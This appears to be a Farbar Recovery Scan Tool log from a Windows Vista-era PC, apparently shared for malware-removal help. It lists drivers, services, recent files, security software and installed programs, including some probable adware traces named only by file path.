S3 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [69632 2007-07-11] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-20] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S4 JRAID; C:\Windows\system32\drivers\jraid.sys [79960 2008-08-19] (JMicron Technology Corp.)
R3 KMWDFILTER; C:\Windows\System32\DRIVERS\KMWDFILTER.sys [17408 2008-10-09] (Windows ® Codename Longhorn DDK provider)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [119512 2015-04-13] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2015-03-17] (Malwarebytes Corporation)
R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [239224 2014-11-15] (Microsoft Corporation)
R3 pfc; C:\Windows\System32\drivers\pfc.sys [21248 2003-09-19] (Padus, Inc.) [File not signed]
S3 rt70x86; C:\Windows\System32\DRIVERS\netr70.sys [306016 2010-04-27] (Ralink Technology Corp.)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-08-19] (Windows ® Codename Longhorn DDK provider)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13464 2014-07-02] ()
S3 cpuz134; \??\C:\Users\Angel\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-13 15:09 - 2015-04-13 15:10 - 00021713 _____ () C:\Users\Angel\Desktop\FRST.txt
2015-04-13 15:09 - 2015-04-13 15:09 - 01135616 _____ (Farbar) C:\Users\Angel\Desktop\FRST.exe
2015-04-13 15:06 - 2015-04-13 15:06 - 00001063 _____ () C:\Malware.txt
2015-04-13 14:44 - 2015-04-13 14:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-04-13 14:41 - 2015-04-13 14:41 - 21540440 _____ (Malwarebytes Corporation ) C:\Users\Angel\Downloads\mbam-setup-2.1.4.1018.exe
2015-04-13 14:32 - 2015-04-13 14:32 - 02217984 _____ () C:\Users\Angel\Downloads\adwcleaner_4.201.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Angel\Downloads\revosetup.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 00001059 _____ () C:\Users\Angel\Desktop\Revo Uninstaller.lnk
2015-04-13 14:19 - 2015-04-13 14:19 - 00000000 ____D () C:\Program Files\VS Revo Group
2015-04-12 20:26 - 2015-04-12 20:54 - 00003364 _____ () C:\Windows\PFRO.log
2015-04-11 22:51 - 2015-04-11 22:51 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-04-11 22:51 - 2015-04-11 22:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-04-11 22:50 - 2015-04-11 22:50 - 00000000 ____D () C:\Program Files\iPod
2015-04-11 22:49 - 2015-04-11 22:49 - 00000000 ____D () C:\Program Files\Bonjour
2015-04-04 22:22 - 2015-04-04 22:22 - 00000000 ____D () C:\ProgramData\WindowsSearch
2015-04-03 18:19 - 2015-04-13 14:44 - 00302165 _____ () C:\Windows\WindowsUpdate.log
2015-04-03 17:31 - 2015-04-03 17:31 - 00000000 ____D () C:\Windows\pss
2015-04-03 17:17 - 2015-04-13 15:09 - 00000000 ____D () C:\FRST
2015-04-02 21:41 - 2015-04-02 21:42 - 00010074 _____ () C:\Users\Angel\Downloads\hijackthis.log
2015-04-02 21:40 - 2015-04-02 21:40 - 00388608 _____ (Trend Micro Inc.) C:\Users\Angel\Downloads\HijackThis.exe
2015-04-02 21:32 - 2015-04-02 21:32 - 00000806 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-04-02 21:31 - 2015-04-02 21:32 - 00000000 ____D () C:\Program Files\CCleaner
2015-04-02 21:20 - 2015-04-02 21:20 - 05346704 _____ (Piriform Ltd) C:\Users\Angel\Downloads\ccsetup504pro.exe
2015-04-02 19:51 - 2015-01-28 20:35 - 00369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-04-02 19:50 - 2015-01-28 20:35 - 00975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-04-02 19:48 - 2015-02-25 19:18 - 02064384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-04-02 19:40 - 2015-02-19 21:03 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-04-02 19:40 - 2015-02-19 19:28 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-04-02 19:39 - 2015-02-25 21:01 - 03604408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-04-02 19:39 - 2015-02-25 21:01 - 03552184 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-04-02 19:39 - 2015-01-08 21:04 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-04-02 19:39 - 2015-01-08 19:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-04-02 19:38 - 2015-03-05 23:01 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-04-02 19:38 - 2015-01-20 21:02 - 00807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-04-02 19:37 - 2015-02-17 21:02 - 11587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-04-02 18:54 - 2015-02-21 12:37 - 12375040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-04-02 18:54 - 2015-02-21 12:34 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-04-02 18:54 - 2015-02-21 12:29 - 09747968 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-04-02 18:54 - 2015-02-21 12:28 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-04-02 18:54 - 2015-02-21 12:22 - 01139200 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-04-02 18:54 - 2015-02-21 12:21 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-04-02 18:54 - 2015-02-21 12:21 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 01803264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-04-02 18:54 - 2015-02-21 12:18 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-04-02 18:54 - 2015-02-21 12:17 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-04-02 14:13 - 2015-04-13 14:34 - 00000000 ____D () C:\AdwCleaner
2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-13 15:09 - 2012-04-28 13:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-04-13 14:49 - 2014-09-29 09:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-04-13 14:44 - 2014-09-29 09:07 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-04-13 14:44 - 2014-09-29 09:07 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-04-13 14:42 - 2006-11-02 05:33 - 00747142 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-04-13 14:37 - 2010-06-11 20:52 - 00000000 ____D () C:\Users\Angel\Tracing
2015-04-13 14:35 - 2014-09-29 09:15 - 00000644 _____ () C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-04-13 14:35 - 2014-09-29 09:00 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-13 14:35 - 2009-02-09 18:08 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2015-04-13 14:35 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-04-13 14:35 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-04-13 14:35 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-04-13 14:34 - 2006-11-02 08:01 - 00032550 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-04-12 20:42 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\rescache
2015-04-12 20:26 - 2006-11-02 07:37 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-04-12 20:26 - 2006-11-02 06:18 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\Program Files\iTunes
2015-04-11 22:50 - 2009-02-17 14:53 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-04-11 22:43 - 2015-02-09 21:19 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-04-06 12:54 - 2009-08-31 22:05 - 00000000 ____D () C:\Users\Angel\Documents\BANK STUFF
2015-04-02 21:34 - 2014-12-08 16:18 - 00000000 ____D () C:\Program Files\Steam
2015-04-02 21:34 - 2010-05-07 11:04 - 00000000 ____D () C:\Windows\Minidump
2015-04-02 21:34 - 2009-09-21 11:48 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Media Player Classic
2015-04-02 21:34 - 2008-02-03 18:07 - 00000000 ____D () C:\Windows\Panther
2015-04-02 19:59 - 2014-09-29 09:15 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-04-02 19:54 - 2006-11-02 07:47 - 00374064 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-04-02 19:50 - 2009-02-17 14:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-04-02 19:48 - 2013-07-12 17:46 - 00000000 ____D () C:\Windows\system32\MRT
2015-04-02 19:41 - 2006-11-02 05:24 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-04-02 19:37 - 2015-02-19 22:52 - 00000000 ____D () C:\Program Files\iPod(68)
2015-04-02 19:13 - 2015-02-16 13:17 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb
2015-04-02 18:45 - 2014-09-29 09:01 - 00002085 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-02 18:36 - 2009-02-16 19:37 - 00000000 ____D () C:\Users\Angel
2015-04-02 18:36 - 2006-11-02 05:22 - 58720256 _____ () C:\Windows\system32\config\software_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 44564480 _____ () C:\Windows\system32\config\components_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 41943040 _____ () C:\Windows\system32\config\system_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 05242880 _____ () C:\Windows\system32\config\default_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\security_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\sam_previous
2015-04-02 18:34 - 2014-12-10 21:10 - 00000000 ____D () C:\Users\Angel\AppData\Local\23897
2015-04-02 18:34 - 2014-12-03 23:05 - 00000000 ____D () C:\Users\Angel\AppData\Local\4657
2015-04-02 18:34 - 2014-12-01 20:28 - 00000000 ____D () C:\Users\Angel\AppData\Local\32244
2015-04-02 18:34 - 2014-09-29 09:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-04-02 18:34 - 2014-09-25 15:58 - 00000000 ____D () C:\Users\Public\518FC3555F9246E4AC8055FCEF3883E5
2015-04-02 18:34 - 2014-09-17 15:32 - 00000000 ____D () C:\Users\Public\B4D0DA65314B4041838806CA0CC88B7B
2015-04-02 18:34 - 2010-08-26 16:30 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\.BitTornado
2015-04-02 18:34 - 2009-09-21 12:05 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\vlc
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\ProgramData\NOS
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\Program Files\NOS
2015-04-02 18:34 - 2009-02-18 15:22 - 00000000 ____D () C:\Users\Angel\Desktop\Iconotopia
2015-04-02 18:34 - 2009-02-17 16:46 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-04-02 18:34 - 2009-02-17 15:25 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-04-02 18:34 - 2009-02-17 14:20 - 00000000 ____D () C:\Users\Angel\AppData\Local\Microsoft Help
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 __RSD () C:\Windows\Media
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\spool
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\Msdtc
2015-04-02 18:33 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\registration
2015-04-02 17:53 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\schemas
2015-03-17 06:15 - 2014-09-29 09:07 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
 
==================== Files in the root of some directories =======
 
2014-08-04 18:04 - 2014-08-04 18:04 - 0000046 _____ () C:\Users\Angel\AppData\Roaming\WB.CFG
2009-02-17 13:32 - 2014-07-29 09:05 - 0007052 _____ () C:\Users\Angel\AppData\Local\d3d9caps.dat
2009-03-03 16:39 - 2012-09-17 20:20 - 0006656 _____ () C:\Users\Angel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-02-17 15:05 - 2009-02-17 15:05 - 0008248 _____ () C:\Users\Angel\AppData\Local\en.ini
2009-02-17 16:51 - 2009-02-17 16:51 - 0000093 _____ () C:\Users\Angel\AppData\Local\fusioncache.dat
2009-02-17 16:00 - 2009-02-17 16:48 - 0003386 _____ () C:\ProgramData\hpzinstall.log
 
Some content of TEMP:
====================
C:\Users\Angel\AppData\Local\Temp\Quarantine.exe
C:\Users\Angel\AppData\Local\Temp\ReimagePackage.exe
C:\Users\Angel\AppData\Local\Temp\ReiSysUpdate.exe
C:\Users\Angel\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-04-13 14:41
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-04-2015
Ran by Angel at 2015-04-13 15:11:20
Running from C:\Users\Angel\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ABBYY FineReader 6.0 Sprint (HKLM\...\{ACF60000-22B9-4CE9-98D6-2CCF359BAC07}) (Version: 6.00.1395.4552 - ABBYY Software House)
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe Download Manager (HKLM\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.48 - NOS Microsystems Ltd.)
Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM\...\{2FE00055-C4F3-4F7A-AEDD-E198D54CF12F}) (Version: 3.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{28ED482A-56DB-47D9-8D9E-990FA8CD7D3D}) (Version: 8.1.0.18 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft PhotoImpression 5 (HKLM\...\{D433ABC3-0CD8-4BB0-B6A9-84501B4B47B7}) (Version:  - ArcSoft)
BitTornado 0.3.17 (HKLM\...\BitTornado) (Version: 0.3.17 - John Hoffman)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Business Tools Launcher (HKLM\...\{75685CA8-0B74-45BB-9C64-744A0FB79EDC}) (Version: 1.00.0000 - Dell Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
CreativeProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CreativeProjectsTemplates (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CueTour (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Destinations (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Devil May Cry 3: Special Edition (HKLM\...\Steam App 6550) (Version:  - CAPCOM Co., Ltd.)
Devil May Cry 4 (HKLM\...\Steam App 45700) (Version:  - Capcom)
Director (Version: 43.1.5.000 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
EPSON Attach To Email (HKLM\...\InstallShield_{20C45B32-5AB6-46A4-94EF-58950CAF05E5}) (Version: 1.01.0000 - SEIKO EPSON)
EPSON Attach To Email (Version: 1.01.0000 - SEIKO EPSON) Hidden
EPSON Copy Utility 3 (HKLM\...\{67EDD823-135A-4D59-87BD-950616D6E857}) (Version: 3.1.5.0 - )
EPSON Event Manager (HKLM\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 1.71.00 - )
EPSON File Manager (HKLM\...\{E86BC406-944E-41F6-ADE6-2C136734C96B}) (Version: 1.1.0.0 - )
EPSON Perf 3490 3590 Guide (HKLM\...\Silent Package Run-Time Sample) (Version:  - )
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
EPSON Scan Assistant (HKLM\...\{2A88F1BF-7041-4E42-84B1-6B4ACB83AC64}) (Version: 1.10.00 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.118 - Google Inc.)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
HP Image Zone 4.0 (HKLM\...\HP Photo & Imaging) (Version: 4.0 - HP)
HP Software Update (HKLM\...\{457791C5-D702-4143-A7B2-2744BE9573F2}) (Version: 2.0.39.20040212 - Hewlett-Packard)
HPSystemDiagnostics (Version: 1.5.0.0 - Your Company Name) Hidden
iCloud (HKLM\...\{79BD66B2-4DAE-4C3B-B08E-DC72E507C163}) (Version: 2.1.3.25 - Apple Inc.)
InstantShare (Version: 4.0.0.40 - Hewlett-Packard) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
iTunes (HKLM\...\{0A37EE62-9A58-420D-90CC-4E52153112EE}) (Version: 11.3.0.54 - Apple Inc.)
Java 7 Update 55 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java™ 6 Update 7 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160070}) (Version: 1.6.0.70 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Linksys Linksys Wireless-G USB Network Adapter Driver - WUSB54Gv4 (HKLM\...\{C7EEF2B9-8C16-4A04-B98D-B1A952A47E55}) (Version: 1.0 - Linksys, A Division of Cisco Systems, Inc.)
Malwarebytes Anti-Malware version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Media Player Classic (HKLM\...\Media Player Classic) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.7.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Overland (Version: 2.1.5 - Hewlett-Packard) Hidden
Peggle Deluxe (HKLM\...\Peggle Deluxe) (Version:  - PopCap Games)
Personal Entertainment Launcher (HKLM\...\{37F964E4-9C3F-4066-B933-1747D3AC6737}) (Version: 1.00.0000 - Dell Inc.)
Photo Viewer 2.4 (HKLM\...\Photo Viewer_is1) (Version:  - )
PhotoGallery (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Photosmart 320,370,7400,8100,8400 Series (HKLM\...\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}) (Version: 2.0 - HP)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Presto! BizCard 4.1 Eng (HKLM\...\Uninstall Presto! BizCard 4.1 Eng) (Version:  - )
PrintScreen (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Product Support Launcher (HKLM\...\{B8ABB25D-1E30-4ED7-A3CE-0F8BED439647}) (Version: 1.00.0000 - Dell Inc.)
PSPrinters06 (Version: 1.00.0000 - HP) Hidden
QFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
QuickProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
